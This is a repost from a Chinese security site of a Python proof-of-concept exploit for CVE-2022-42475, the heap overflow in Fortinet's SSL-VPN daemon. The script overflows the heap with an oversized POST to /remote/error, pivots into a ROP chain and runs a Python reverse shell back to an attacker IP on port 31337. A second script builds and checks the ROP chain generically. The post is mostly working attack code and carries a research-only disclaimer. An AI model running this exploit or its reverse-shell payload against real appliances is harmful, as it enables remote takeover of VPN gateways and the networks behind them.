CVE-2022-42475 Fortinet (飞塔)

admin, 2024-11-24 12:20:47

https://github.com/scrt/cve-2022-42475

Proof-of-concept code exploiting the heap-based buffer overflow in Fortinet's SSL-VPN daemon (sslvpnd), CVE-2022-42475. The script sends a POST to /remote/error with an oversized Content-Length, then pivots into a ROP chain that calls execve() on /bin/python with a reverse-shell script. The target-side addresses are hardcoded for one specific build and memory layout.


```python
import socket
import ssl
import sys
from pwn import p64   # only p64 is used; struct.pack("<Q", v) would be equivalent

# usage: python3 exploit.py <target_host> <target_port> <reverse_ip> "<argv for /bin/sh>"
target_host = sys.argv[1]
target_port = sys.argv[2]
reverse = sys.argv[3]
# argv[4] is turned into a Python list literal that the reverse-shell stub passes to execve('/bin/sh', ...)
params = sys.argv[4].split(" ")
strparams = "["
for param in params:
    strparams += "'" + param + "',"
strparams = strparams[:-1]
strparams += "]"

# binary functions
execve = p64(0x0042e050)

# binary gadgets
movrdirax = p64(0x00000000019d2196)  # : mov rdi, rax ; call r13 (unused)
poprsi = p64(0x000000000042f0f8)     # : pop rsi ; ret
poprdx = p64(0x000000000042f4a5)     # : pop rdx ; ret
jmprax = p64(0x0000000000433181)     # : jmp rax
pops = p64(0x000000000165cfd7)       # : pop rdx ; pop rbx ; pop r12 ; pop r13 ; pop rbp ; ret
poprax = p64(0x00000000004359af)     # : pop rax ; ret
gadget1 = p64(0x0000000001697e0d)    # : push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret (stack pivot)
poprdi = p64(0x000000000042ed7e)     # : pop rdi ; ret
rax3 = gadget1

# hardcoded value which would probably need to be bruteforced or leaked
hardcoded = 0x00007fc5f128e000
scbase = p64(hardcoded)              # unused
rdi = p64(hardcoded + 0xc48)
cmd = p64(hardcoded + 0xd38)
# execve argument block at asdf: path string, then the argv pointer array, then the argv strings
asdf = hardcoded + 0xd38
cmd1 = p64(asdf)        # "/bin/python"
cmd2 = p64(asdf + 16)   # argv[] = {arg1, arg2, arg3, NULL}
arg1 = p64(asdf + 48)   # "python"
arg2 = p64(asdf + 56)   # "-c"
arg3 = p64(asdf + 64)   # the reverse-shell script

# execve("/bin/python", ["python", "-c", script], NULL): rax=execve, rdi=path, rsi=argv, rdx=0, jmp rax
ropchain = poprax
ropchain += execve
ropchain += poprdi
ropchain += cmd1
ropchain += poprsi
ropchain += cmd2
ropchain += poprdx
ropchain += p64(0)
ropchain += jmprax
ropchain += b"/bin/python\x00\x00\x00\x00\x00"
ropchain += arg1
ropchain += arg2
ropchain += arg3
ropchain += p64(0)
ropchain += b"python\x00\x00"
ropchain += b"-c\x00\x00\x00\x00\x00\x00"
ropchain += b"""import socket,sys,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('""" + reverse.encode() + b"""',31337))
[os.dup2(s.fileno(),x) for x in range(3)]
i=os.fork()
if i==0:
 os.execve('/bin/sh', """ + strparams.encode() + b""",{})
\x00\x00"""

# do not verify the appliance's certificate; this must be set before wrap_socket()
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE

try:
    with socket.create_connection((target_host, int(target_port, 10))) as sock:
        with context.wrap_socket(sock, server_hostname=target_host) as ssock:
            ssock.settimeout(2)
            # overflow padding, then the pivot gadgets (gadget1: push rbx ; ... ; pop rsp)
            # that move rsp onto ropchain
            payload = b"A" * 173096 + rdi + poprdi + cmd + pops + b"A" * 40 + pops + rax3 + b"C" * 32 + ropchain
            # the oversized Content-Length is what triggers the heap overflow in sslvpnd
            tosend = (b"POST /remote/error HTTP/1.1\r\nHost: " + target_host.encode()
                      + b"\r\nContent-Length: 115964117980\r\n\r\n" + payload)
            ssock.sendall(tosend)
            r = ssock.recv(10024)
except Exception as e:
    print("Exception occurred :" + repr(e))
```
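The hand-computed offsets in the PoC (cmd1 = asdf, cmd2 = asdf+16, arg1..arg3 = asdf+48/56/64) are easy to get wrong when the path, the argument count or the script change. The following Python is an added example, not code from the scrt repository or the original post: it builds the same execve argument block and ROP chain generically from a chain address, then reads the chain back the way the kernel would (rdi to the path, rsi to a NULL-terminated argv array) to confirm every pointer resolves to the intended string. Gadget and function addresses are the ones listed in the PoC; the chain address is derived from the PoC's hardcoded value and is a sample, not a leaked address.

```python
import struct

# Gadget/function addresses copied from the PoC above (sslvpnd binary); sample values only.
GADGETS = {
    "execve":  0x0042e050,   # execve() in the binary
    "pop_rax": 0x004359af,   # pop rax ; ret
    "pop_rdi": 0x0042ed7e,   # pop rdi ; ret
    "pop_rsi": 0x0042f0f8,   # pop rsi ; ret
    "pop_rdx": 0x0042f4a5,   # pop rdx ; ret
    "jmp_rax": 0x00433181,   # jmp rax
}

# Chain header: pop rax, execve, pop rdi, path, pop rsi, argv, pop rdx, 0, jmp rax
CHAIN_HEADER_LEN = 9 * 8


def p64(v):
    return struct.pack("<Q", v)


def u64(b):
    return struct.unpack("<Q", b)[0]


def cstr8(s):
    """NUL-terminate s and pad with NULs to an 8-byte boundary, so each
    following field stays 8-byte aligned (the PoC does this by hand)."""
    s += b"\x00"
    return s + b"\x00" * (-len(s) % 8)


def build_execve_block(base, path, argv):
    """Lay out, starting at address `base`: the path string, the NULL-terminated
    argv pointer array, then the argv strings. Returns (bytes, path_addr, argv_addr)."""
    path_bytes = cstr8(path)
    argv_addr = base + len(path_bytes)
    cursor = argv_addr + 8 * (len(argv) + 1)   # first argv string follows the pointer array
    ptrs, strings = b"", b""
    for a in argv:
        ptrs += p64(cursor)
        s = cstr8(a)
        strings += s
        cursor += len(s)
    ptrs += p64(0)
    return path_bytes + ptrs + strings, base, argv_addr


def build_chain(chain_addr, gadgets, path, argv):
    """ROP chain calling execve(path, argv, NULL), assuming it is placed at chain_addr."""
    block, path_addr, argv_addr = build_execve_block(chain_addr + CHAIN_HEADER_LEN, path, argv)
    chain = p64(gadgets["pop_rax"]) + p64(gadgets["execve"])
    chain += p64(gadgets["pop_rdi"]) + p64(path_addr)
    chain += p64(gadgets["pop_rsi"]) + p64(argv_addr)
    chain += p64(gadgets["pop_rdx"]) + p64(0)
    chain += p64(gadgets["jmp_rax"])
    return chain + block


def simulate_execve(chain, chain_addr):
    """Treat `chain` as memory at chain_addr and read back what execve would see:
    the path at rdi and the argv array at rsi. Raises if a pointer leaves the chain."""
    def read_cstr(addr):
        off = addr - chain_addr
        if not 0 <= off < len(chain):
            raise ValueError("pointer %#x points outside the chain" % addr)
        return chain[off:chain.index(b"\x00", off)]

    rdi = u64(chain[24:32])
    rsi = u64(chain[40:48])
    rdx = u64(chain[56:64])
    if rdx != 0:
        raise ValueError("envp must be NULL")
    argv, off = [], rsi - chain_addr
    while True:
        ptr = u64(chain[off:off + 8])
        if ptr == 0:
            break
        argv.append(read_cstr(ptr))
        off += 8
    return read_cstr(rdi), argv


if __name__ == "__main__":
    # In the PoC the argument block sits at hardcoded + 0xd38 and the 72-byte header just before it.
    chain_addr = 0x00007fc5f128e000 + 0xd38 - CHAIN_HEADER_LEN
    script = b"import os\nos.system('id')\n"   # constructed stand-in for the reverse-shell stub
    chain = build_chain(chain_addr, GADGETS, b"/bin/python", [b"python", b"-c", script])
    print(simulate_execve(chain, chain_addr))
```

The read-back only proves the chain is internally consistent for the address it was built for; it cannot tell whether that address is correct on a given appliance, which is exactly the value the PoC's own comment says must be leaked or brute-forced.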

Originally published on the WeChat public account Khan安全攻防实验室: Cve-2022-42475 飞塔

Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who put this information to any other use bear full legal and joint liability; this site accepts no legal or joint liability. For questions, contact us by e-mail (please use a corporate or otherwise valid mailbox so the message is not blocked; contact details are on the home page).
When reposting, please keep the link to this article (CN-SEC中文网, with thanks to the original author): Cve-2022-42475 飞塔 https://cn-sec.com/archives/1618361.html
